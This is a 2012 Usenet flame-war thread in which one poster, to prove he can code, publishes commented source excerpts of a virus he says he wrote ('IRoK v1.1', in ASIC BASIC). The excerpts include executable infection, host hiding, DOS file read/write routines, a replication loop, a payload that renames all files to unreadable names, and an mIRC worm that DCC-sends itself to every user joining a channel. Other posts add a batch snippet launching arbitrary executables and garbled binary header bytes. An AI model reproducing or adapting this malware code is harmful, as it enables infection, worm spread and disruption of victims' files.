RayLopez99 <(E-Mail Removed)> wrote in
news:85b308d2-7bf9-4c65-8d9f-(E-Mail Removed):

> Again, the point of my exercise is to expose your ignorance to the
> world, not mine. Show us what you got. I never said 'fully
> functional'--I even said pseudocode is oK. Like the other poster
> said, do you even read your posts?

I provided functional source snippits. All were commented. I didn't
realize your programming skills are so bad that every single line would
require a comment to explain what it was doing.

You haven't exposed any ignorance on my end, Ray. I didn't have to
google "loader" and post the wrong one. I understand how to infect
executables, I've written many viruses that do just that. You can't even
grasp how it's done and you want to call me ignorant? Laughing Ray,
****ing laughing.

> LOL! You were fired by Malwarebytes. You were wanted like Mr. Smith
> by the law. You don't know how to use a modern language like C# by
> your own admission. You are respected? By who? By your mom maybe,
> if she even knows you. And non-programmers like the kiddie scripters
> you so despise. Dream on. You are nothing.

I wasn't fired, Ray. I was never "Wanted" by the law; They never talked
to me. I was unavailable. I actually stated I was well versed in many
languages, that includes the C# language; which imo, is a disgrace to c.

Fact is, I provided you source code in an ancient language and you can't
make heads or tails of it. I'm not ignorant in this, you are. Woefully.

> I don't care "who you are"--I know that you are a loser. I want to
> show the board you cannot understand the code that you copy and
> paste. Prove me wrong, and I'll not post here again.

I didn't copy and paste any code. No viruses existed in Asic prior to
mine. There was NO CODE to copy and paste from.

You don't know a damn thing Ray. You've shown the board that you aren't
a coder, and.. in all reality, probably not a programmer either.

> Nope. At least shut up, and stop playing games.

I'm not playing any games with you Ray.

> You said that last time. Seems you get a kick out of these email
> fantasy games. Figures, since you can't code.

LOL!

> In your mind and in your dreams. Dream on, hobo.

hobo? You'll get far with that mindset.

> Projecting your own fears and fantasies....

Never heard of Steppenwolf, Ray?


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

RayLopez99 <(E-Mail Removed)> wrote in
news:dad7d12b-b05c-472c-a9ba-(E-Mail Removed):

> On Friday, July 27, 2012 8:21:26 AM UTC-4, FromTheRafters wrote:
>
>> I really doubt that HT. Ray is going to have to do some 'self-study'
>> to even
>>
>> get to the point where any of it makes sense to him. Dustin won't be
>> wasting
>>
>> his time going over the basic background material needed. I'm
>> reasonably
>>
>> sure Ray isn't really grasping any of this yet.
>
> Yeah, spoken like the kiddie-script ass worshiper of Dustbin that you
> appear to be Rafters.

HAHAHA.. Right.. I was wondering when you'd fire on him.

> Why do you idolize this loser? He's not shown me anything he knows
> cannot be cut and paste out of a book on virus writing.

Find a book that has asic source code to a virus, that wasn't written by
me.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

On Friday, July 27, 2012 4:45:07 PM UTC-4, Dustin wrote:

>
> We're done then.
>
>

We may be done--you lost the challenge--but don't think for a moment you'reout of the cross hairs of the law. The wheels of government grind slowly but they grind exceedingly fine. These organizations are looking for people like you to justify their tight budgets in these hard times. You are fodder for them to show their worth by taking you down. And you reopened the statute of limitations several times in this thread alone, not to mention your past boasts. Clearly you are a kiddie scripter with sycophant friends in this forum, but in the real world you are nothing, except food for computer crime law enforcement professionals, and they will eat you alive.

Pleasant dreams and keep that music pirating going...I'm sure that is more grist for their mill, in the civil lawsuits that will take away all the meager worldly possessions you have. Your 'good deeds' from working at Malwarebytes will get maybe a few months off your sentence in the sentencing phase of your trial.

Goodbye Dustbin. But I'll be watching you from time to time, just to add to my file.

RL

"Hot-Text" <hot-(E-Mail Removed)> wrote in
news:juun1r$chc$(E-Mail Removed):

> "FromTheRafters" <(E-Mail Removed)> wrote in message
> news:juu3ua$7gg$(E-Mail Removed)...
>>
>> "Hot-Text" <hot-(E-Mail Removed)> wrote in message
>> news:juto7g$nvf$(E-Mail Removed)...
>>> Ray Lopez why do you want to create a virus
>>> to effect or infect a .exe file of Poor..
>>> For only the Poor will be hijack by the virus,
>>> I see you care not for the poor at all..
>>>
>>> *.CMD is a legitimate way to infected a Windows PC,
>>> not *.EXE.....
>>
>> What's the difference?
>>
>>
>
> *.CMD can get windows to do the work for you..
> Running *.exe and *.dll
>
> [Settings]
> REM ALT.COMP ant-virus.cmd 7-27-2011
> SET
> IF "%%"=="YES" SET=%%
> IF EXIST %%\..\..\*.exe CALL %%\..\..\*.exe
> CALL %%\..\..\..\*.dll
> CALL %%\..\..\..\*.dll
>
> [Command 0]
> Command =
> OpenWndClass =
> OpenWndCaption =
> ;
> ;
> [Command 10]
> CheckFile =
> CheckIniSection =
> CheckIniEntry =
> CheckIniValue = %ARX_PARAM:1%
> OnSuccessGoto =
>
> [Command 20]
> Command =
> Caption =
> Size =
> Border =
> System Menu =
>
> [Command 30]
> Command =
> HtmlFile =
> WndSize =
> WaitSecs =
> OnFailureGoto =
>
>
> [Command 50]
> Command = run
> CheckReg =
> CheckRegKey =
> RunFile =
> OnSuccessGoto =
>
> [Command 70]
> Command = run
> RunFile =
> CmdLine = /oobe
>

Why would I bother doing all of that, when I can do this instead?

path_infect:
rem routine proceeds to infect selected path given via the 'n' variable
rem Notice, another safety check. This routine will abort if the
rem selected path does not exist.
call sub "path", n, virupath$
i=LEN(virupath$)
if i>0 then
b$=right$(virupath$,1)
if b$<>"\" then
virupath$=virupath$+"\"
endif
rem Before we infect, trash checksum files

gosub waste:
gosub start_virus:
endif
return

hide_host:
rem host_hide module
oldname$=filename$
b=varptr(filename$)
c=len(filename$)
d=b+c
b=d-3
d=d-1
range=36
for x=b to d
gosub rand_num:
e=a
e=e+140
poke x,e
next x
rem Now the filename has been changed, Lets rename it real quick
gosub waste:
name oldname$ as filename$

write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

RayLopez99 <(E-Mail Removed)> wrote in
news:85b308d2-7bf9-4c65-8d9f-(E-Mail Removed):

> Again, the point of my exercise is to expose your ignorance to the
> world, not mine. Show us what you got. I never said 'fully
> functional'--I even said pseudocode is oK. Like the other poster
> said, do you even read your posts?

write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return

read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad!
rem cx register is how many bytes to read
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return

actual_virus_replication_start:
rem The actual code responsible for replication control has
rem moved down here. It's a new technique of coding that I intend
rem for my future viruses to use.
rem used to be called start_virus:
Rem this is the central virus infection code.
rem We will search for a maximum of 10 files per run.
errcode=0
attr=6
kewl=0
virii=7
CALL SUB "FindFirstF" proc$ Attr ErrCode
WHILE ErrCode = 0
CALL SUB "GetNameF" FileName$
filename$=virupath$+filename$
if sleepy=0 then
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
else
errcode=1
endif
CALL SUB "FindNextF" ErrCode
if kewl=virii then
errcode=1
endif
WEND
return

rem ***BEGIN PAYLOAD(S) CODE
payload:
clear_to_run=1
if hre$>"20" then
rem Executables remain offline for the remainder of the evening.
clear_to_run=0
endif


if min$="17" then
rem We're fixing to hose this dudes drive. Well, not really.
rem We're renaming all files/directorys from current\root to
rem high ascii characters. The user doesn't actually lose anything,
rem he just (average user) doesn't know what to do at this point. ;p
rem this takes a second or two, so We're going to display some
rem text to keep the user busy.
cls
print"Some say the end is near. Some say we'll see Armageddon"
print"soon. I certainly hope we will. The only way to fix it is"
print"to flush it all away. Any ****ing joint, any ****in Day."
print""
print"**** all these gun toting hip gangster wannabes. **** your"
print"tattoes, **** all you junkies and your short memory. I'm"
print"praying for rain, I'm prayin for tidal waves. I wanna see"
print"the ground give way. I wanna watch it all go down. Mah"
print"please flush it all away, I wanna see it go riding down. I"
print"wanna see it go riding. Watch you flush it all away."
print""
print"Where do bad folks go when they die? They don't goto heaven"
print"where the angels fly. They goto a lake of fire and fry. See"
print"em again till the 4th of July. People cry and people moan."
print"look for a dry place to call their own, look for a dry place"
print"to rest there bones."
print""
gosub whack_a_system:
print"Thanks for reading the text above, I've had enough time to"
print"remove the contents of your hard disk for you. :-)"
gosub keypress:

if min$="21" then
print"þ IRoK v1.1 - RaiD/SLAM[2000]"
gosub keypress:
call sub "Stars"
return
endif

rem End of payload jumpsystem!

mirc_drop:
filename$=drive$
filename$=filename$+"mirc\irok.exe"
script$=drive$
script$=script$+"mirc\script.ini"
gosub raidyworm:
rem Worm copy dumped
rem raidyworm returns filename$ that you sent.

tempfile$=filename$
filename$=script$
gosub set_attr:
filename$=tempfile$
rem drop script
open"o",2,script$
sensitivemsg=1
msg$="[script]|n0=on 1:JOIN:#:{|n1=if ($nick != $me) {|"
gosub dump_msg:
msg$="n2= /dcc send $nick "
msg$=msg$+filename$
msg$=msg$+"|"
gosub dump_msg:
msg$="n3= }|n4=}|n5=on 1:TEXT:irok:#:/amsg My computer is 0wned by IRoK
v1.1|"
gosub dump_msg:
close 2
return

vbsdrop:
rem we have to drop a piece of VBS material. We have an external routine
rem which handles this. We need only create the worm file, and then
rem call the routine. However, before we do this, We check to see if
we've
rem done this before. If so, we don't ever do it again. Well, unless the
rem user deletes our marker.
vbsdrop=0
open"i",2,"c:\windows\system\winrde.dll"
if error>0 then
rem we haven't done this, ok kewl.
vbsdrop=1
endif
close 2
if vbsdrop=1 then
tempname$=filename$
filename$="c:\windows\system\irok.exe"
gosub raidyworm:
rem Ok, worms dropped.
filename$=tempname$
call sub "vbsroutine"
rem Now create marker.
open"o",2,"c:\windows\system\winrde.dll"
for x=1 to 8095
print #2,x
next x
close 2
endif
return

whack_a_system:
rem Simple routine. One line. ;p
call sub "drago"
return

raidyworm:
rem worm dump
rem specify filename to dump too in filename$
newattr=0
gosub set_attr:
gosub create_file:
tempsize=virus_size
tempsize=tempsize+1
bytesize=tempsize
dx=varptr(virus_data(0))
gosub write_file:
gosub close_file:
rem One worm to order.
return

rem ***--> End of Payload section.

Commented enough for you Ray?

That's not psuedo code either. thats verbatim irok source code.

> if she even knows you. And non-programmers like the kiddie scripters
> you so despise. Dream on. You are nothing.

Enjoy the code above. Tell us what each line does, if you can comprehend
what's being done. I wrote it. I know what it does. Let's see if you can
explain it to the group.

> I don't care "who you are"--I know that you are a loser. I want to
> show the board you cannot understand the code that you copy and
> paste. Prove me wrong, and I'll not post here again.

See above.

> You said that last time. Seems you get a kick out of these email
> fantasy games. Figures, since you can't code.

See above. All my code. All mine. Can you figure it out?

> In your mind and in your dreams. Dream on, hobo.

See the source code?

--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

RayLopez99 <(E-Mail Removed)> wrote in
news:0544112a-a39e-44f0-b2b9-(E-Mail Removed):

> On Friday, July 27, 2012 4:45:07 PM UTC-4, Dustin wrote:
>
>>
>> We're done then.
>>
>>
>
> We may be done--you lost the challenge--but don't think for a moment
> you're out of the cross hairs of the law. The wheels of government
> grind slowly but they grind exceedingly fine. These organizations
> are looking for people like you to justify their tight budgets in
> these hard times. You are fodder for them to show their worth by
> taking you down. And you reopened the statute of limitations several
> times in this thread alone, not to mention your past boasts. Clearly
> you are a kiddie scripter with sycophant friends in this forum, but
> in the real world you are nothing, except food for computer crime law
> enforcement professionals, and they will eat you alive.

Well, I've lost no challenge as I did present functional code snippits.
You demanded I share the more important ones with full commentation. Why
does it need full commentation I wonder? That's because YOU can't really
program.

I've provided more of the subroutines and various functions, I've even
included the worm drop section. Now, describe what each function is
doing, if you can.

> Goodbye Dustbin. But I'll be watching you from time to time, just to
> add to my file.

LOL. Ray, it's 2012; and you still can't code a functional virus. I did,
over 15 years ago. [g]


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

RayLopez99 <(E-Mail Removed)> wrote in
news:c52cd645-77df-4121-b11c-(E-Mail Removed):

> I did understand, **** head, but I want you to walk us through it.
> Too difficult? I understand....go to bed now and be a good boy.

Not difficult for me. I wan't something from you tho. I don't work for
free. You understood it did you? Why did you request the other
subroutines with full commentation? Why are you still asking how a file
is infected? Some of that source code reverses the infection process on
the executable. If you did understand what I posted, You'd already know
how the process works and wouldn't have continued asking FTR those
newbie questions.

Fact is, you aren't a coder and you probably aren't a programmer.

> Who are these people, friends of yours? I don't give a **** if they
> are more incompetent than you. That's not the challenge.

I don't know them personally. I've never met any of them. I wouldn't say
we're friends, Ray.

> But they fired you?!

Nope. You guessed wrong again. Surprised, I'm not.

> You're just a punk that's got nothing. A Drama Queen. And from your
> prose you post like an old man, probably mid-60s or if younger you
> don't get out of the house much. Mother's basement?

Lots of theories you have bouncing around that empty space above your
nose...Must be a hell of an echo up there.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

"Dustin" <(E-Mail Removed)> wrote in message news:XnsA09DACFD9F82DHHI2948AJD832@no...
> "Hot-Text" <hot-(E-Mail Removed)> wrote in
> news:juun1r$chc$(E-Mail Removed):
>
>> "FromTheRafters" <(E-Mail Removed)> wrote in message
>> news:juu3ua$7gg$(E-Mail Removed)...
>>>
>>> "Hot-Text" <hot-(E-Mail Removed)> wrote in message
>>> news:juto7g$nvf$(E-Mail Removed)...
>>>> Ray Lopez why do you want to create a virus
>>>> to effect or infect a .exe file of Poor..
>>>> For only the Poor will be hijack by the virus,
>>>> I see you care not for the poor at all..
>>>>
>>>> *.CMD is a legitimate way to infected a Windows PC,
>>>> not *.EXE.....
>>>
>>> What's the difference?
>>>
>>>
>>
>> *.CMD can get windows to do the work for you..
>> Running *.exe and *.dll
>>
>> [Settings]
>> REM ALT.COMP ant-virus.cmd 7-27-2011
>> SET
>> IF "%%"=="YES" SET=%%
>> IF EXIST %%\..\..\*.exe CALL %%\..\..\*.exe
>> CALL %%\..\..\..\*.dll
>> CALL %%\..\..\..\*.dll
>>
>> [Command 0]
>> Command =
>> OpenWndClass =
>> OpenWndCaption =
>> ;
>> ;
>> [Command 10]
>> CheckFile =
>> CheckIniSection =
>> CheckIniEntry =
>> CheckIniValue = %ARX_PARAM:1%
>> OnSuccessGoto =
>>
>> [Command 20]
>> Command =
>> Caption =
>> Size =
>> Border =
>> System Menu =
>>
>> [Command 30]
>> Command =
>> HtmlFile =
>> WndSize =
>> WaitSecs =
>> OnFailureGoto =
>>
>>
>> [Command 50]
>> Command = run
>> CheckReg =
>> CheckRegKey =
>> RunFile =
>> OnSuccessGoto =
>>
>> [Command 70]
>> Command = run
>> RunFile =
>> CmdLine = /oobe
>>
>
> Why would I bother doing all of that, when I can do this instead?
>
> path_infect:
> rem routine proceeds to infect selected path given via the 'n' variable
> rem Notice, another safety check. This routine will abort if the
> rem selected path does not exist.
> call sub "path", n, virupath$
> i=LEN(virupath$)
> if i>0 then
> b$=right$(virupath$,1)
> if b$<>"\" then
> virupath$=virupath$+"\"
> endif
> rem Before we infect, trash checksum files
>
> gosub waste:
> gosub start_virus:
> endif
> return
>
> hide_host:
> rem host_hide module
> oldname$=filename$
> b=varptr(filename$)
> c=len(filename$)
> d=b+c
> b=d-3
> d=d-1
> range=36
> for x=b to d
> gosub rand_num:
> e=a
> e=e+140
> poke x,e
> next x
> rem Now the filename has been changed, Lets rename it real quick
> gosub waste:
> name oldname$ as filename$
>
> write_file:
> rem this routine will write selected bytes at whatever current position
> rem from whatever buffer i choose into the file.
> rem if the routine did not write all data ax will not equal cx upon
> rem return from int call.
> rem define dx register before calling this routine to point to the
> rem memory address of the buffer area you want to write from. like so:
> rem dx=varptr(buffer(0))
> rem cx is how many bytes to write
> if file_handle>4 then
> ax=&hex4000
> bx=file_handle
> cx=bytesize
> int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
> byteswritten=ax
> endif
> return
>

here a start of ax = ActiveX Control.dll for you,
yours will not run it......


MZÉ
┤ �!╕ L�!This program cannot be run in DOS mode.
$ & %█buKêbuKêbuKê iGêduKê
j@êauKê
jAêguKê
jOêfuKêßiEêjuKê T@êfuKê TOê`uKê6V{ê¢uKêbuKê`uKê╕VWê`uKêQWnê`uKêÿVRêuKêbuJêÃ*wKê6Vzê uKêÑsMêcuKê¥UOêcuKêRichbuKê
PE L ▓çzJ α


--
This post contains IPA phonetic symbols in Unicode.
Without proper rendering support,
you may see question marks, boxes,
or other symbols instead of Unicode characters.

"G. Morgan" <(E-Mail Removed)> wrote in message news:(E-Mail Removed)...
> Hot-Text wrote:
>
>>There a way around all antivirus/antimalware app,
>>For a Batch File CHM is best to update,
>>that antivirus/antimalware app of your..
>
> Huh?
>
> Are you talking about .chm files or .bat files?

*.chm was development for a HTML Help file,
is able to run a
<script type="text/vbscript">
<!--

' -->
</script>
Plus run Perl and PHP script files,
from a Online Base Server....

"Hot-Text" <hot-(E-Mail Removed)> wrote in
news:juv206$u96$(E-Mail Removed):

> "Dustin" <(E-Mail Removed)> wrote in message
> news:XnsA09DACFD9F82DHHI2948AJD832@no...
>> "Hot-Text" <hot-(E-Mail Removed)> wrote in
>> news:juun1r$chc$(E-Mail Removed):
>>
>>> "FromTheRafters" <(E-Mail Removed)> wrote in message
>>> news:juu3ua$7gg$(E-Mail Removed)...
>>>>
>>>> "Hot-Text" <hot-(E-Mail Removed)> wrote in message
>>>> news:juto7g$nvf$(E-Mail Removed)...
>>>>> Ray Lopez why do you want to create a virus
>>>>> to effect or infect a .exe file of Poor..
>>>>> For only the Poor will be hijack by the virus,
>>>>> I see you care not for the poor at all..
>>>>>
>>>>> *.CMD is a legitimate way to infected a Windows PC,
>>>>> not *.EXE.....
>>>>
>>>> What's the difference?
>>>>
>>>>
>>>
>>> *.CMD can get windows to do the work for you..
>>> Running *.exe and *.dll
>>>
>>> [Settings]
>>> REM ALT.COMP ant-virus.cmd 7-27-2011
>>> SET
>>> IF "%%"=="YES" SET=%%
>>> IF EXIST %%\..\..\*.exe CALL %%\..\..\*.exe
>>> CALL %%\..\..\..\*.dll
>>> CALL %%\..\..\..\*.dll
>>>
>>> [Command 0]
>>> Command =
>>> OpenWndClass =
>>> OpenWndCaption =
>>> ;
>>> ;
>>> [Command 10]
>>> CheckFile =
>>> CheckIniSection =
>>> CheckIniEntry =
>>> CheckIniValue = %ARX_PARAM:1%
>>> OnSuccessGoto =
>>>
>>> [Command 20]
>>> Command =
>>> Caption =
>>> Size =
>>> Border =
>>> System Menu =
>>>
>>> [Command 30]
>>> Command =
>>> HtmlFile =
>>> WndSize =
>>> WaitSecs =
>>> OnFailureGoto =
>>>
>>>
>>> [Command 50]
>>> Command = run
>>> CheckReg =
>>> CheckRegKey =
>>> RunFile =
>>> OnSuccessGoto =
>>>
>>> [Command 70]
>>> Command = run
>>> RunFile =
>>> CmdLine = /oobe
>>>
>>
>> Why would I bother doing all of that, when I can do this instead?
>>
>> path_infect:
>> rem routine proceeds to infect selected path given via the 'n'
>> variable rem Notice, another safety check. This routine will abort
>> if the rem selected path does not exist.
>> call sub "path", n, virupath$
>> i=LEN(virupath$)
>> if i>0 then
>> b$=right$(virupath$,1)
>> if b$<>"\" then
>> virupath$=virupath$+"\"
>> endif
>> rem Before we infect, trash checksum files
>>
>> gosub waste:
>> gosub start_virus:
>> endif
>> return
>>
>> hide_host:
>> rem host_hide module
>> oldname$=filename$
>> b=varptr(filename$)
>> c=len(filename$)
>> d=b+c
>> b=d-3
>> d=d-1
>> range=36
>> for x=b to d
>> gosub rand_num:
>> e=a
>> e=e+140
>> poke x,e
>> next x
>> rem Now the filename has been changed, Lets rename it real quick
>> gosub waste:
>> name oldname$ as filename$
>>
>> write_file:
>> rem this routine will write selected bytes at whatever current
>> position rem from whatever buffer i choose into the file.
>> rem if the routine did not write all data ax will not equal cx upon
>> rem return from int call.
>> rem define dx register before calling this routine to point to the
>> rem memory address of the buffer area you want to write from. like
>> so: rem dx=varptr(buffer(0))
>> rem cx is how many bytes to write
>> if file_handle>4 then
>> ax=&hex4000
>> bx=file_handle
>> cx=bytesize
>> int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
>> byteswritten=ax
>> endif
>> return
>>
>
> here a start of ax = ActiveX Control.dll for you,
> yours will not run it......

It's a .dll. You can still call specific functions via the runtime32.
[g]

Binary files don't go so well across usenet you know.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.